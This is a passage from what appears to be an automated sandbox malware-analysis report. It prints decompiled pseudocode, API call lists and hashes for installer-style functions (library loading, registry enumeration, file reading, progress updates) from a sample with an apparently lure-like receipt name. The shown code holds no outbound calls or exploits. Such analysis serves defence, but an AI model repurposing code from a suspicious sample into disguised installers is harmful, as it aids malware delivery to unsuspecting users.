                                                                                                                      						E00405414(0xfffffff7,  *((intOrPtr*)(_t39 - 0x3c)));
                                                                                                                      					} else {
                                                                                                                      						 *(_t39 - 4) = _t32;
                                                                                                                      						if( *((intOrPtr*)(_t39 - 0x20)) == _t32) {
                                                                                                                      							 *_t38( *((intOrPtr*)(_t39 - 8)), 0x400, _t34, 0x40cddc, 0x40a000); // executed
                                                                                                                      						} else {
                                                                                                                      							E00401423( *((intOrPtr*)(_t39 - 0x20)));
                                                                                                                      							if( *_t38() != 0) {
                                                                                                                      								 *(_t39 - 4) = 1;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					if( *((intOrPtr*)(_t39 - 0x1c)) == _t32 && E00403A5E( *(_t39 + 8)) != 0) {
                                                                                                                      						FreeLibrary( *(_t39 + 8));
                                                                                                                      					}
                                                                                                                      					goto L16;
                                                                                                                      				}
                                                                                                                      				_t31 = GetModuleHandleW(_t37); // executed
                                                                                                                      				 *(_t39 + 8) = _t31;
                                                                                                                      				if(_t31 != __ebx) {
                                                                                                                      					goto L4;
                                                                                                                      				}
                                                                                                                      				goto L3;
                                                                                                                      			}










                                                                                                                      0x0040202c
                                                                                                                      0x0040202c
                                                                                                                      0x00402031
                                                                                                                      0x00402038
                                                                                                                      0x004020f7
                                                                                                                      0x00402245
                                                                                                                      0x00402245
                                                                                                                      0x00402abf
                                                                                                                      0x00402ac2
                                                                                                                      0x00402ace
                                                                                                                      0x00402ace
                                                                                                                      0x00402047
                                                                                                                      0x00402051
                                                                                                                      0x00402054
                                                                                                                      0x00402064
                                                                                                                      0x00402068
                                                                                                                      0x00402070
                                                                                                                      0x00402073
                                                                                                                      0x004020f0
                                                                                                                      0x00000000
                                                                                                                      0x004020f0
                                                                                                                      0x00402075
                                                                                                                      0x00402080
                                                                                                                      0x00402084
                                                                                                                      0x004020c4
                                                                                                                      0x00402086
                                                                                                                      0x00402089
                                                                                                                      0x0040208c
                                                                                                                      0x004020b8
                                                                                                                      0x0040208e
                                                                                                                      0x00402091
                                                                                                                      0x0040209a
                                                                                                                      0x0040209c
                                                                                                                      0x0040209c
                                                                                                                      0x0040209a
                                                                                                                      0x0040208c
                                                                                                                      0x004020cc
                                                                                                                      0x004020e5
                                                                                                                      0x004020e5
                                                                                                                      0x00000000
                                                                                                                      0x004020cc
                                                                                                                      0x00402057
                                                                                                                      0x0040205f
                                                                                                                      0x00402062
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000

                                                                                                                      APIs
                                                                                                                      • GetModuleHandleW.KERNELBASE(00000000,?,000000F0), ref: 00402057
                                                                                                                        • Part of subcall function 00405414: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000,?), ref: 0040544C
                                                                                                                        • Part of subcall function 00405414: lstrlenW.KERNEL32(00402EEC,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000), ref: 0040545C
                                                                                                                        • Part of subcall function 00405414: lstrcatW.KERNEL32(00422708,00402EEC), ref: 0040546F
                                                                                                                        • Part of subcall function 00405414: SetWindowTextW.USER32(00422708,00422708), ref: 00405481
                                                                                                                        • Part of subcall function 00405414: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054A7
                                                                                                                        • Part of subcall function 00405414: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054C1
                                                                                                                        • Part of subcall function 00405414: SendMessageW.USER32(?,00001013,?,00000000), ref: 004054CF
                                                                                                                      • LoadLibraryExW.KERNELBASE(00000000,?,00000008,?,000000F0), ref: 00402068
                                                                                                                      • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,?,000000F0), ref: 004020E5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 334405425-0
                                                                                                                      • Opcode ID: 42c91a853bb56df8df6d246a963233e01271a64902b4d1cb279e57af8709dc4c
                                                                                                                      • Instruction ID: efb744b1bbbaa1f1e58e2693dd3ff93cd36a27706c6aad24c330354b17a2434d
                                                                                                                      • Opcode Fuzzy Hash: 42c91a853bb56df8df6d246a963233e01271a64902b4d1cb279e57af8709dc4c
                                                                                                                      • Instruction Fuzzy Hash: 6F21C531900218EBCF20AFA5CE4CA9E7A70AF04354F60413BF610B61E1DBBD4991DA6E
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 86%
                                                                                                                      			E004024F2(int* __ebx, intOrPtr __edx, short* __esi) {
                                                                                                                      				int _t10;
                                                                                                                      				long _t13;
                                                                                                                      				int* _t16;
                                                                                                                      				intOrPtr _t21;
                                                                                                                      				void* _t22;
                                                                                                                      				short* _t24;
                                                                                                                      				void* _t26;
                                                                                                                      				void* _t29;
                                                                                                                      
                                                                                                                      				_t24 = __esi;
                                                                                                                      				_t21 = __edx;
                                                                                                                      				_t16 = __ebx;
                                                                                                                      				_t22 = E00402C77(_t29, 0x20019);
                                                                                                                      				_t10 = E00402C15(3);
                                                                                                                      				 *((intOrPtr*)(_t26 - 0x4c)) = _t21;
                                                                                                                      				 *__esi = __ebx;
                                                                                                                      				if(_t22 == __ebx) {
                                                                                                                      					 *((intOrPtr*)(_t26 - 4)) = 1;
                                                                                                                      				} else {
                                                                                                                      					 *(_t26 + 8) = 0x3ff;
                                                                                                                      					if( *((intOrPtr*)(_t26 - 0x18)) == __ebx) {
                                                                                                                      						_t13 = RegEnumValueW(_t22, _t10, __esi, _t26 + 8, __ebx, __ebx, __ebx, __ebx);
                                                                                                                      						__eflags = _t13;
                                                                                                                      						if(_t13 != 0) {
                                                                                                                      							 *((intOrPtr*)(_t26 - 4)) = 1;
                                                                                                                      						}
                                                                                                                      					} else {
                                                                                                                      						RegEnumKeyW(_t22, _t10, __esi, 0x3ff);
                                                                                                                      					}
                                                                                                                      					_t24[0x3ff] = _t16;
                                                                                                                      					_push(_t22); // executed
                                                                                                                      					RegCloseKey(); // executed
                                                                                                                      				}
                                                                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t26 - 4));
                                                                                                                      				return 0;
                                                                                                                      			}











                                                                                                                      0x004024f2
                                                                                                                      0x004024f2
                                                                                                                      0x004024f2
                                                                                                                      0x004024fe
                                                                                                                      0x00402500
                                                                                                                      0x00402508
                                                                                                                      0x0040250b
                                                                                                                      0x0040250e
                                                                                                                      0x00402885
                                                                                                                      0x00402514
                                                                                                                      0x0040251c
                                                                                                                      0x0040251f
                                                                                                                      0x00402538
                                                                                                                      0x0040253e
                                                                                                                      0x00402540
                                                                                                                      0x00402542
                                                                                                                      0x00402542
                                                                                                                      0x00402521
                                                                                                                      0x00402525
                                                                                                                      0x00402525
                                                                                                                      0x00402549
                                                                                                                      0x00402550
                                                                                                                      0x00402551
                                                                                                                      0x00402551
                                                                                                                      0x00402ac2
                                                                                                                      0x00402ace

                                                                                                                      APIs
                                                                                                                      • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402525
                                                                                                                      • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 00402538
                                                                                                                      • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsl3DD.tmp,00000000,00000011,00000002), ref: 00402551
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Enum$CloseValue
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 397863658-0
                                                                                                                      • Opcode ID: 8516ab6244c740045cdce88d39b59d629fdfba5b0b8a15bddcbd681e8b57d1bd
                                                                                                                      • Instruction ID: 4fa2f3c06f6248971957712acf2942ced6ba336c37b2851dfbda8b2cd28c17b0
                                                                                                                      • Opcode Fuzzy Hash: 8516ab6244c740045cdce88d39b59d629fdfba5b0b8a15bddcbd681e8b57d1bd
                                                                                                                      • Instruction Fuzzy Hash: 6D017171904104EFE7159FA5DE89ABFB6B8EF44348F10403EF105A62D0DAB84E459B69
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 92%
                                                                                                                      			E004031BA(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
                                                                                                                      				long _v8;
                                                                                                                      				long _t21;
                                                                                                                      				long _t22;
                                                                                                                      				void* _t24;
                                                                                                                      				long _t26;
                                                                                                                      				int _t27;
                                                                                                                      				long _t28;
                                                                                                                      				void* _t29;
                                                                                                                      				void* _t30;
                                                                                                                      				long _t31;
                                                                                                                      				long _t32;
                                                                                                                      				long _t36;
                                                                                                                      
                                                                                                                      				_t21 = _a4;
                                                                                                                      				if(_t21 >= 0) {
                                                                                                                      					_t32 = _t21 +  *0x42a2b8;
                                                                                                                      					 *0x418ed4 = _t32;
                                                                                                                      					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
                                                                                                                      				}
                                                                                                                      				_t22 = E004032C2(4);
                                                                                                                      				if(_t22 >= 0) {
                                                                                                                      					_t24 = E00405F25( *0x40a01c,  &_a4, 4); // executed
                                                                                                                      					if(_t24 == 0) {
                                                                                                                      						L18:
                                                                                                                      						_push(0xfffffffd);
                                                                                                                      						goto L19;
                                                                                                                      					} else {
                                                                                                                      						 *0x418ed4 =  *0x418ed4 + 4;
                                                                                                                      						_t36 = E004032C2(_a4);
                                                                                                                      						if(_t36 < 0) {
                                                                                                                      							L21:
                                                                                                                      							_t22 = _t36;
                                                                                                                      						} else {
                                                                                                                      							if(_a12 != 0) {
                                                                                                                      								_t26 = _a4;
                                                                                                                      								if(_t26 >= _a16) {
                                                                                                                      									_t26 = _a16;
                                                                                                                      								}
                                                                                                                      								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
                                                                                                                      								if(_t27 != 0) {
                                                                                                                      									_t36 = _v8;
                                                                                                                      									 *0x418ed4 =  *0x418ed4 + _t36;
                                                                                                                      									goto L21;
                                                                                                                      								} else {
                                                                                                                      									goto L18;
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								if(_a4 <= 0) {
                                                                                                                      									goto L21;
                                                                                                                      								} else {
                                                                                                                      									while(1) {
                                                                                                                      										_t28 = _a4;
                                                                                                                      										if(_a4 >= 0x4000) {
                                                                                                                      											_t28 = 0x4000;
                                                                                                                      										}
                                                                                                                      										_v8 = _t28;
                                                                                                                      										_t29 = E00405F25( *0x40a01c, 0x414ed0, _t28); // executed
                                                                                                                      										if(_t29 == 0) {
                                                                                                                      											goto L18;
                                                                                                                      										}
                                                                                                                      										_t30 = E00405F54(_a8, 0x414ed0, _v8); // executed
                                                                                                                      										if(_t30 == 0) {
                                                                                                                      											_push(0xfffffffe);
                                                                                                                      											L19:
                                                                                                                      											_pop(_t22);
                                                                                                                      										} else {
                                                                                                                      											_t31 = _v8;
                                                                                                                      											_a4 = _a4 - _t31;
                                                                                                                      											 *0x418ed4 =  *0x418ed4 + _t31;
                                                                                                                      											_t36 = _t36 + _t31;
                                                                                                                      											if(_a4 > 0) {
                                                                                                                      												continue;
                                                                                                                      											} else {
                                                                                                                      												goto L21;
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      										goto L22;
                                                                                                                      									}
                                                                                                                      									goto L18;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      				L22:
                                                                                                                      				return _t22;
                                                                                                                      			}















                                                                                                                      0x004031be
                                                                                                                      0x004031c7
                                                                                                                      0x004031d0
                                                                                                                      0x004031d4
                                                                                                                      0x004031df
                                                                                                                      0x004031df
                                                                                                                      0x004031e7
                                                                                                                      0x004031ee
                                                                                                                      0x00403200
                                                                                                                      0x00403207
                                                                                                                      0x004032ac
                                                                                                                      0x004032ac
                                                                                                                      0x00000000
                                                                                                                      0x0040320d
                                                                                                                      0x00403210
                                                                                                                      0x0040321c
                                                                                                                      0x00403220
                                                                                                                      0x004032ba
                                                                                                                      0x004032ba
                                                                                                                      0x00403226
                                                                                                                      0x00403229
                                                                                                                      0x00403288
                                                                                                                      0x0040328e
                                                                                                                      0x00403290
                                                                                                                      0x00403290
                                                                                                                      0x004032a2
                                                                                                                      0x004032aa
                                                                                                                      0x004032b1
                                                                                                                      0x004032b4
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0040322b
                                                                                                                      0x0040322e
                                                                                                                      0x00000000
                                                                                                                      0x00403234
                                                                                                                      0x00403239
                                                                                                                      0x00403240
                                                                                                                      0x00403243
                                                                                                                      0x00403245
                                                                                                                      0x00403245
                                                                                                                      0x00403252
                                                                                                                      0x00403255
                                                                                                                      0x0040325c
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00403265
                                                                                                                      0x0040326c
                                                                                                                      0x00403284
                                                                                                                      0x004032ae
                                                                                                                      0x004032ae
                                                                                                                      0x0040326e
                                                                                                                      0x0040326e
                                                                                                                      0x00403271
                                                                                                                      0x00403274
                                                                                                                      0x0040327a
                                                                                                                      0x00403280
                                                                                                                      0x00000000
                                                                                                                      0x00403282
                                                                                                                      0x00000000
                                                                                                                      0x00403282
                                                                                                                      0x00403280
                                                                                                                      0x00000000
                                                                                                                      0x0040326c
                                                                                                                      0x00000000
                                                                                                                      0x00403239
                                                                                                                      0x0040322e
                                                                                                                      0x00403229
                                                                                                                      0x00403220
                                                                                                                      0x00403207
                                                                                                                      0x004032bc
                                                                                                                      0x004032bf

                                                                                                                      APIs
                                                                                                                      • SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403166,000000FF,00000000,00000000,0040A230,?), ref: 004031DF
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FilePointer
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 973152223-0
                                                                                                                      • Opcode ID: af526002166308cc95fa76d49654f36d838bd7a13899b6376ccfe278c881acad
                                                                                                                      • Instruction ID: 4c6ae7a0626839fce45d877b24888c0af913333af22313e68c4d1644c71cb298
                                                                                                                      • Opcode Fuzzy Hash: af526002166308cc95fa76d49654f36d838bd7a13899b6376ccfe278c881acad
                                                                                                                      • Instruction Fuzzy Hash: 3B319C3020021AFFDB109F95ED84ADB3F68EB04359B1085BEF904E6190D778CE509BA9
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 84%
                                                                                                                      			E0040247E(int* __ebx, char* __esi) {
                                                                                                                      				void* _t17;
                                                                                                                      				short* _t18;
                                                                                                                      				long _t21;
                                                                                                                      				void* _t33;
                                                                                                                      				void* _t37;
                                                                                                                      				void* _t40;
                                                                                                                      
                                                                                                                      				_t35 = __esi;
                                                                                                                      				_t27 = __ebx;
                                                                                                                      				_t17 = E00402C77(_t40, 0x20019); // executed
                                                                                                                      				_t33 = _t17;
                                                                                                                      				_t18 = E00402C37(0x33);
                                                                                                                      				 *__esi = __ebx;
                                                                                                                      				if(_t33 == __ebx) {
                                                                                                                      					 *(_t37 - 4) = 1;
                                                                                                                      				} else {
                                                                                                                      					 *(_t37 - 0x4c) = 0x800;
                                                                                                                      					_t21 = RegQueryValueExW(_t33, _t18, __ebx, _t37 + 8, __esi, _t37 - 0x4c); // executed
                                                                                                                      					if(_t21 != 0) {
                                                                                                                      						L7:
                                                                                                                      						 *_t35 = _t27;
                                                                                                                      						 *(_t37 - 4) = 1;
                                                                                                                      					} else {
                                                                                                                      						if( *(_t37 + 8) == 4) {
                                                                                                                      							__eflags =  *(_t37 - 0x18) - __ebx;
                                                                                                                      							 *(_t37 - 4) = 0 |  *(_t37 - 0x18) == __ebx;
                                                                                                                      							E004062F7(__esi,  *__esi);
                                                                                                                      						} else {
                                                                                                                      							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
                                                                                                                      								 *(_t37 - 4) =  *(_t37 - 0x18);
                                                                                                                      								_t35[0x7fe] = _t27;
                                                                                                                      							} else {
                                                                                                                      								goto L7;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					_push(_t33); // executed
                                                                                                                      					RegCloseKey(); // executed
                                                                                                                      				}
                                                                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *(_t37 - 4);
                                                                                                                      				return 0;
                                                                                                                      			}









                                                                                                                      0x0040247e
                                                                                                                      0x0040247e
                                                                                                                      0x00402483
                                                                                                                      0x0040248a
                                                                                                                      0x0040248c
                                                                                                                      0x00402493
                                                                                                                      0x00402496
                                                                                                                      0x00402885
                                                                                                                      0x0040249c
                                                                                                                      0x0040249f
                                                                                                                      0x004024af
                                                                                                                      0x004024ba
                                                                                                                      0x004024ea
                                                                                                                      0x004024ea
                                                                                                                      0x004024ed
                                                                                                                      0x004024bc
                                                                                                                      0x004024c0
                                                                                                                      0x004024d9
                                                                                                                      0x004024e0
                                                                                                                      0x004024e3
                                                                                                                      0x004024c2
                                                                                                                      0x004024c5
                                                                                                                      0x004024d0
                                                                                                                      0x00402549
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x004024c5
                                                                                                                      0x004024c0
                                                                                                                      0x00402550
                                                                                                                      0x00402551
                                                                                                                      0x00402551
                                                                                                                      0x00402ac2
                                                                                                                      0x00402ace

                                                                                                                      APIs
                                                                                                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 004024AF
                                                                                                                      • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsl3DD.tmp,00000000,00000011,00000002), ref: 00402551
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseQueryValue
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3356406503-0
                                                                                                                      • Opcode ID: f52346af362575f0bd8f9fd17b10da85a324ed83e8aa7253beac06d572a16313
                                                                                                                      • Instruction ID: 2d27e3624369fee7c217219a4e344138e42523264533ea489648bddc6477d6d2
                                                                                                                      • Opcode Fuzzy Hash: f52346af362575f0bd8f9fd17b10da85a324ed83e8aa7253beac06d572a16313
                                                                                                                      • Instruction Fuzzy Hash: 53119171900209EBEB24DFA4CA585AEB6B4EF04344F20843FE046A62C0D7B84A45DB5A
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 69%
                                                                                                                      			E00401389(signed int _a4) {
                                                                                                                      				intOrPtr* _t6;
                                                                                                                      				void* _t8;
                                                                                                                      				void* _t10;
                                                                                                                      				signed int _t11;
                                                                                                                      				void* _t12;
                                                                                                                      				signed int _t16;
                                                                                                                      				signed int _t17;
                                                                                                                      				void* _t18;
                                                                                                                      
                                                                                                                      				_t17 = _a4;
                                                                                                                      				while(_t17 >= 0) {
                                                                                                                      					_t6 = _t17 * 0x1c +  *0x42a290;
                                                                                                                      					if( *_t6 == 1) {
                                                                                                                      						break;
                                                                                                                      					}
                                                                                                                      					_push(_t6); // executed
                                                                                                                      					_t8 = E00401434(); // executed
                                                                                                                      					if(_t8 == 0x7fffffff) {
                                                                                                                      						return 0x7fffffff;
                                                                                                                      					}
                                                                                                                      					_t10 = E0040136D(_t8);
                                                                                                                      					if(_t10 != 0) {
                                                                                                                      						_t11 = _t10 - 1;
                                                                                                                      						_t16 = _t17;
                                                                                                                      						_t17 = _t11;
                                                                                                                      						_t12 = _t11 - _t16;
                                                                                                                      					} else {
                                                                                                                      						_t12 = _t10 + 1;
                                                                                                                      						_t17 = _t17 + 1;
                                                                                                                      					}
                                                                                                                      					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                                                                                                      						 *0x42922c =  *0x42922c + _t12;
                                                                                                                      						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x42922c, 0x7530,  *0x429214), 0);
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      				return 0;
                                                                                                                      			}











                                                                                                                      0x0040138a
                                                                                                                      0x004013fa
                                                                                                                      0x0040139b
                                                                                                                      0x004013a0
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x004013a2
                                                                                                                      0x004013a3
                                                                                                                      0x004013ad
                                                                                                                      0x00000000
                                                                                                                      0x00401404
                                                                                                                      0x004013b0
                                                                                                                      0x004013b7
                                                                                                                      0x004013bd
                                                                                                                      0x004013be
                                                                                                                      0x004013c0
                                                                                                                      0x004013c2
                                                                                                                      0x004013b9
                                                                                                                      0x004013b9
                                                                                                                      0x004013ba
                                                                                                                      0x004013ba
                                                                                                                      0x004013c9
                                                                                                                      0x004013cb
                                                                                                                      0x004013f4
                                                                                                                      0x004013f4
                                                                                                                      0x004013c9
                                                                                                                      0x00000000

                                                                                                                      APIs
                                                                                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                      • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3850602802-0
                                                                                                                      • Opcode ID: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
